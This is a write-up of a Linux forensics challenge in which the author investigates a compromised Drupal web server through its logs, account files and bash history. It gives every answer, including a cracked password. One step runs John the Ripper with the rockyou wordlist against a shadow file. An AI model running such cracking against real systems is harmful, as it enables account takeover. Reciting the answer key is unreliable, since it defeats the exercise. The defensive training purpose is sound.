Category : Endpoint Forensics (Linux)
LEVEL : Medium
Challenge DownLoad Link : https://cyberdefenders.org/blueteam-ctf-challenges/enroll/71
Instructions:
- Uncompress the challenge (pass: cyberdefenders.org)
Scenario :
A soc analyst has been called to analyze a compromised Linux web server. Figure out how the threat actor gained access, what modifications were applied to the system, and what persistent techniques were utilized. (e.g. backdoors, users, sessions, etc).
Tools:
Q1-What is the system timezone?
- First thing , open the challenge file with FTK :
- Now Go to /root/etc/timezone and open the file :
THE ANSWER : Europe/BrusselsQ2-Who was the last user to log in to the system?
- Go to /root/var/log/auth.log , and go to the last log :
THE ANSWER : mailQ3-What was the source port the user ‘mail’ connected from?
- Form the same file (auth.log) :
THE ANSWER : 57708 Q4-How long was the last session for user ‘mail’? (Minutes only)
- In the auth.log file i notice that , the last session form “mail” user start in Oct 5 13:23:39 and end in Oct 5 13:24:11 :
THE ANSWER : 1Q5-Which server service did the last user use to log in to the system?
- In the auth.log file there is accepted ssh login attempt ,
so i guess the attacker used ssh service :
THE ANSWER : sshdQ6-What type of authentication attack was performed against the target machine?
- Open the auth.log file and grep with “failed” , will will notice a large number of failed ssh login attempts , so i was sure the answer is brute-force attack .
THE ANSWER : brute-forceQ7-How many IP addresses are listed in the ‘/var/log/lastlog’ file?
- Open lastlog file :
THE ANSWER : 2Q8-How many users have a login shell?
- Go to /etc/passwd :
THE ANSWER : 5Q9-What is the password of the mail user?
- First go /etc/shadow and get user “mail” hash :
- Now use John the Ripper to get the password :
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt shadow
THE ANSWER : forensicsQ10-Which user account was created by the attacker?
- Go auth.log file and grep with “useradd” :
THE ANSWER : phpQ11-How many user groups exist on the machine?
- Go to /etc/Group and use and count the number :
THE ANSWER : 58Q12-How many users have sudo access?
- Go to /etc/group , and search for sudo group :
THE ANSWER : 2Q13-What is the home directory of the PHP user?
- Check /etc/passwd file and search for “PHP” user :
THE ANSWER : /usr/phpQ14-What command did the attacker use to gain root privilege? (Answer contains two spaces).
- Go to /var/mail/bash_history :
THE ANSWER : sudo su -Q15-Which file did the user ‘root’ delete?
- Go to /root/bash_history :
THE ANSWER : 37292.c Q16-Recover the deleted file, open it and extract the exploit author name.
- After some time searching in different directories , in /tmp directory i found this suspicious file and once clicked, Microsoft defender alert me :
Now go to exploit database :
THE ANSWER : rebelQ17-What is the content management system (CMS) installed on the machine?
- Go to /var/www/html/jabc/index.php and open the file :
THE ANSWER : drupal Q18-What is the version of the CMS installed on the machine?
- Form the hint Check {‘/var/www/html/includes/bootstrap.inc’} so go to this path and open the file bootstrap.inc :
THE ANSWER : 7.26Q19-Which port was listening to receive the attacker’s reverse shell?
- Since we know attacker IP-add from previous question 192.168.210.131
- Now go to /var/log/apache/access.log file and search for connection with this IP-add :
- Now Go to CyberChef and decode this post request form attacker :
THE ANSWE : 4444THE END
BY : Ahmed Nasser
